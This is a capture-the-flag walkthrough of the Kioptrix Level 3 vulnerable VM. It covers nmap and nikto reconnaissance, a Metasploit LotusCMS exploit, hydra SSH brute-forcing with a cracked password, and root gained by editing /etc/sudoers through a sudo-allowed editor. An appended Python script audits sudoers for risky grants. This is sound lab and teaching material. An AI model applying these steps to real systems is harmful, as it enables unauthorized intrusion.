So going back to popping these vulnerable VMs, on to Kioptrix Level 3
Name: Kioptrix: Level 1.2 (#3)
Date release: 18 Apr 2011
Author: Kioptrix
Series: Kioptrix
Web page: http://www.kioptrix.com/blog/?p=358
Vulnhub: https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
🔥HOST DISCOVERY🔥
ARP
arp-scan -l
ping
ping 192.168.0.20
The box is up and responding
🔥PORT SCANNING🔥
TCP
nmap -sS -A -sC -sV -O -p0- 192.168.0.20 -oA nmap_tcp_full_ver_sV
UDP
nmap -sU -n 192.168.0.20 -oA nmap_udp_def
hmmm nothing for UDP then
🔥SERVICE ENUMERATION 🔥
22 - ssh
ssh 192.168.0.20
80 - http
Has a login page
http://192.168.0.20/index.php?system=Admin
we enumerate the platform LotusCMS
nikto -h 192.168.0.20
A few more bits found with nikto
http://192.168.0.20/phpmyadmin/
phpmyadmin - 2.11.3.0
🔥EXPLOITATION🔥
Looking through metasploit we find a likely exploit
exploit/multi/http/lcms_php_exec
Execution of the exploit gives us a shell with www-data permissions
🔥PRIV ESCALATION🔥
Looking around the file system
I found the user loneferret so decided to try brute-forcing SSH using hydra. More on this later.
Gconfig.php has MySQL creds stored in clear text, which will be useful.
Checking back on my bruteforcing a little later we have a hit
hydra -e nsr -l loneferret -P /usr/share/wordlists/rockyou.txt -t 4 192.168.0.20 ssh
Now SSH'd in as loneferret:starwars
sudo ht
gives us an error, but using Google-fu we find a quick fix
https://stackoverflow.com/questions/6804208/nano-error-error-opening-terminal-xterm-256color
Once we get it working we are faced with this screen.
After fighting with the GUI and figuring out how to use this, I open /etc/sudoers using Alt+F
I added , /bin/sh to the end so we can bump to root.
Try again
got root 😎😎😎
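The root path above works because a sudo grant on an editor is a grant on /etc/sudoers itself. The following audit is an added example, not part of the original write-up: it flags sudoers entries that hand out an editor or a shell, and the sample entries, paths and binary lists in it are constructed assumptions.

```python
import re

# Assumed, non-exhaustive lists for this example. Editors can rewrite
# /etc/sudoers when run as root; "ht" is the editor used in the write-up.
EDITORS = {"ht", "vi", "vim", "nano", "emacs", "ed"}
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}

SPEC = re.compile(r"^(?P<who>\S+)\s+(?P<host>\S+?)\s*=\s*(?P<rest>.+)$")
PREFIX = re.compile(r"^(?:\([^)]*\)\s*|[A-Z_]+:\s*)+")  # "(runas)" and "TAG:"


def audit_sudoers(text):
    """Return (who, command_path, reason) for each risky sudoers grant."""
    findings = []
    for line in text.replace("\\\n", " ").splitlines():  # join continuations
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")) or "_Alias" in line:
            continue
        m = SPEC.match(line)
        if not m:
            continue
        for cmd in m.group("rest").split(","):
            cmd = PREFIX.sub("", cmd.strip())
            if not cmd or cmd.startswith("!"):  # a denial grants nothing
                continue
            path = cmd.split()[0]
            name = path.rsplit("/", 1)[-1]
            if name in SHELLS:
                findings.append((m.group("who"), path, "shell as root"))
            elif name in EDITORS:
                findings.append((m.group("who"), path, "editor can rewrite sudoers"))
    return findings


# Constructed sample (not copied from the VM): BEFORE models a sudoers file that
# grants an editor, AFTER the same file once ", /bin/sh" has been appended.
BEFORE = "root ALL=(ALL) ALL\nloneferret ALL=NOPASSWD: !/bin/bash, /usr/local/bin/ht\n"
AFTER = BEFORE.rstrip("\n") + ", /bin/sh\n"

if __name__ == "__main__":
    for label, text in (("before", BEFORE), ("after", AFTER)):
        for finding in audit_sudoers(text):
            print(label, *finding, sep="\t")
```

Where file edits as root are genuinely needed, sudoedit on a specific path is the usual replacement for granting the editor binary.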